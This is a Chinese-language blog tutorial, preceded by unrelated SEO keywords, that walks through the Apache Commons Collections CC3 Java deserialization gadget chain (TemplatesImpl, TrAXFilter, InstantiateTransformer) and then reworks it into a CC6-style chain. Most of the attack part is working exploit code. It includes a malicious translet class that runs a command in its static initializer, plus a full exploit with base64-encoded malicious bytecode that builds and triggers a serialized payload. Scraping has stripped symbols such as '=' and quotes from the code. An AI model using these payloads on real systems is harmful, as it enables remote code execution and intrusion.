外网建筑设计网站,南通城乡建设局网站首页,seo教程有什么,北京承达创建装饰工程有限公司目录
关于TemplatesImpl
关于TemplatesImpl加载字节码
CC3链分析
纯CC3demo
根据CC3改CC6 关于TemplatesImpl
TemplatesImpl 是 Java 中的一个类#xff0c;通常与 Java 反序列化漏洞相关的攻击中被使用。该类位于 Java 标准库中的 javax.xml.transform 包下。
在 Java…目录
关于TemplatesImpl
关于TemplatesImpl加载字节码
CC3链分析
纯CC3demo
根据CC3改CC6 关于TemplatesImpl
TemplatesImpl 是 Java 中的一个类通常与 Java 反序列化漏洞相关的攻击中被使用。该类位于 Java 标准库中的 javax.xml.transform 包下。
在 Java 反序列化漏洞中攻击者通常会构造恶意的序列化数据通过触发反序列化操作来执行恶意代码。TemplatesImpl 类是一个常见的利用目标因为它可以在 deserialization 过程中触发 Transformer 的 newTransformer 方法并执行一些恶意代码。
下面是 TemplatesImpl 类的一些重要属性和方法
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl - 实际上是 Apache Xalan 库中 com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl 类的一个变种。_bytecodes - 用于存储编译后的模板字节码。_name - 用于存储模板名称。newTransformer() - 触发调用时会返回一个新的 Transformer 对象可用于执行 XSLT 转换。process() - 这个方法通常被攻击者利用来执行恶意代码。
攻击者可以构造一个恶意的序列化数据将 TemplatesImpl 对象包含在其中并通过反序列化触发 newTransformer 方法执行恶意代码 关于TemplatesImpl加载字节码
TemplatesImpl#getOutputProperties() - TemplatesImpl#newTransformer() -
TemplatesImpl#getTransletInstance() - TemplatesImpl#defineTransletClasses()
- TransletClassLoader#defineClass()
需要注意
TemplatesImpl 中对加载的字节码是有一定要求的这个字节码对应的类必须 是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。 CC3链分析
之前提到的CC1和CC6的sink(漏洞污染链条的执行点)都在InvokerTransformer上若WAF直接禁用了该类我们可以用CC3来突破CC3的sink在于上面提到的TemplatesImpl的newTransformer方法它最后会调用defineClass()将字节码初始化成一个可控的类若该类是有着精心构造的静态方法的恶意类便可以完成攻击。 那么接下来的问题是从哪里去触发TemplatesImpl的newTransformer方法呢
我们重点关注com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter这个类的构造⽅法中调⽤了 (TransformerImpl) templates.newTransformer()
public TrAXFilter(Templates templates) throwsTransformerConfigurationException{_templates templates;_transformer (TransformerImpl) templates.newTransformer();_transformerHandler new TransformerHandlerImpl(_transformer);_overrideDefaultParser _transformer.overrideDefaultParser();}
而templates的类型是private Templates private Templates _templates;private TransformerImpl _transformer;private TransformerHandlerImpl _transformerHandler;private boolean _overrideDefaultParser;
关于TrAXFilter构造⽅法的调用这里要用到新的Transformer实现类InstantiateTransformer顾名思义实例化转换器它的transform方法会调用将传入的object实例化并传入args自然也会调用其构造方法
public Object transform(Object input) {try {if (!(input instanceof Class)) {throw new FunctorException(InstantiateTransformer: Input object was not an instanceof Class, it was a (input null ? null object : input.getClass().getName()));} else {Constructor con ((Class)input).getConstructor(this.iParamTypes);return con.newInstance(this.iArgs);}}
此外InstantiateTransformer的构造方法传入的分别就是 paramTypes和args了所以TemplatesImpl实例化对象可以在这里进行传入。 public InstantiateTransformer(Class[] paramTypes, Object[] args) {this.iParamTypes paramTypes;this.iArgs args;}
到了这一步我们的目的就是调用InstantiateTransformer的transform方法了
请看下面的exp 纯CC3demo
evil.java(运行项目后生成class文件复制绝对路径即可)
package com.CC3;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers)throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator,SerializationHandler handler) throws TransletException {}static {try {Runtime.getRuntime().exec(calc);} catch (IOException e) {throw new RuntimeException(e);}}
}
CC3demo
package com.CC3;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;public class CC3 {public static void main(String[] args) throws Exception{TemplatesImpl templates new TemplatesImpl();//设置变量确保函数流程走通Class templatesClass templates.getClass();Field nameField templatesClass.getDeclaredField(_name);nameField.setAccessible(true);nameField.set(templates,xxx);Field bytecodesField templatesClass.getDeclaredField(_bytecodes);bytecodesField.setAccessible(true);//code是要传的恶意代码byte[] code Files.readAllBytes(Paths.get(C:\\Users\\21135\\Desktop\\CC6lab\\target\\classes\\com\\CC3\\evil.class));byte[][] codes {code};bytecodesField.set(templates,codes);Field tfactoryField templatesClass.getDeclaredField(_tfactory);tfactoryField.setAccessible(true);tfactoryField.set(templates,new TransformerFactoryImpl());//触发调用函数
// templates.newTransformer();// new TrAXFilter(templates);InstantiateTransformer instantiateTransformer new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});instantiateTransformer.transform(TrAXFilter.class);}
} 根据CC3改CC6
玩个花的先把字节码转成base64编码 exp:
package com.CC3;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Map;import java.lang.reflect.Field;
import java.util.Base64;public class CC3 {public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {Field field obj.getClass().getDeclaredField(fieldName);field.setAccessible(true);field.set(obj, value);}public static void main(String[] args) throws Exception {Transformer[] faketransformers new Transformer[]{new ConstantTransformer(1)};byte[] code Base64.getDecoder().decode(yv66vgAAADcANQoACQAkCgAlACYIACcKACUAKAcAKQcAKgoABgArBwAsBwAtAQAGPGluaXQAQAD KClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMB AA5MY29tL0NDMy9ldmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFu L2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2Vy aWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3Jn L2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4v b3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsB AApFeGNlcHRpb25zBwAuAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNs dGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0 b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0 aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJu YWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94 bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEA AWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlAQAKU291cmNlRmlsZQEA CWV2aWwuamF2YQwACgALBwAvDAAwADEBAARjYWxjDAAyADMBABNqYXZhL2lvL0lPRXhjZXB0aW9u AQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoANAEADGNvbS9DQzMvZXZpbAEAQGNvbS9z dW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNs ZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNl cHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVu dGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7AQAY KExqYXZhL2xhbmcvVGhyb3dhYmxlOylWACEACAAJAAAAAAAEAAEACgALAAEADAAAAC8AAQABAAAA BSq3AAGxAAAAAgANAAAABgABAAAACwAOAAAADAABAAAABQAPABAAAAABABEAEgACAAwAAAA/AAAA AwAAAAGxAAAAAgANAAAABgABAAAADQAOAAAAIAADAAAAAQAPABAAAAAAAAEAEwAUAAEAAAABABUA FgACABcAAAAEAAEAGAABABEAGQACAAwAAABJAAAABAAAAAGxAAAAAgANAAAABgABAAAADwAOAAAA KgAEAAAAAQAPABAAAAAAAAEAEwAUAAEAAAABABoAGwACAAAAAQAcAB0AAwAXAAAABAABABgACAAe AAsAAQAMAAAAZgADAAEAAAAXuAACEgO2AARXpwANS7sABlkqtwAHv7EAAQAAAAkADAAFAAMADQAA ABYABQAAABIACQAVAAwAEwANABQAFgAWAA4AAAAMAAEADQAJAB8AIAAAACEAAAAHAAJMBwAFCQAB ACIAAAACACM);TemplatesImpl obj new TemplatesImpl();setFieldValue(obj, _bytecodes, new byte[][]{code});setFieldValue(obj, _name, xxx);setFieldValue(obj, _tfactory, new TransformerFactoryImpl());Transformer[] transformers new Transformer[]{new ConstantTransformer(TrAXFilter.class),new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{obj})};Transformer transformersChain new ChainedTransformer(faketransformers);Map innerMap new HashMap();Map outerMap LazyMap.decorate(innerMap, transformersChain);TiedMapEntry tme new TiedMapEntry(outerMap, keykey);Map expMap new HashMap();expMap.put(tme, valuevalue);outerMap.remove(keykey);setFieldValue(transformersChain, iTransformers, transformers);// ⽣成序列化字符串ByteArrayOutputStream barr new ByteArrayOutputStream();ObjectOutputStream oos new ObjectOutputStream(barr);oos.writeObject(expMap);oos.close();System.out.println(barr);ObjectInputStream ois new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));Object o (Object) ois.readObject();}
}
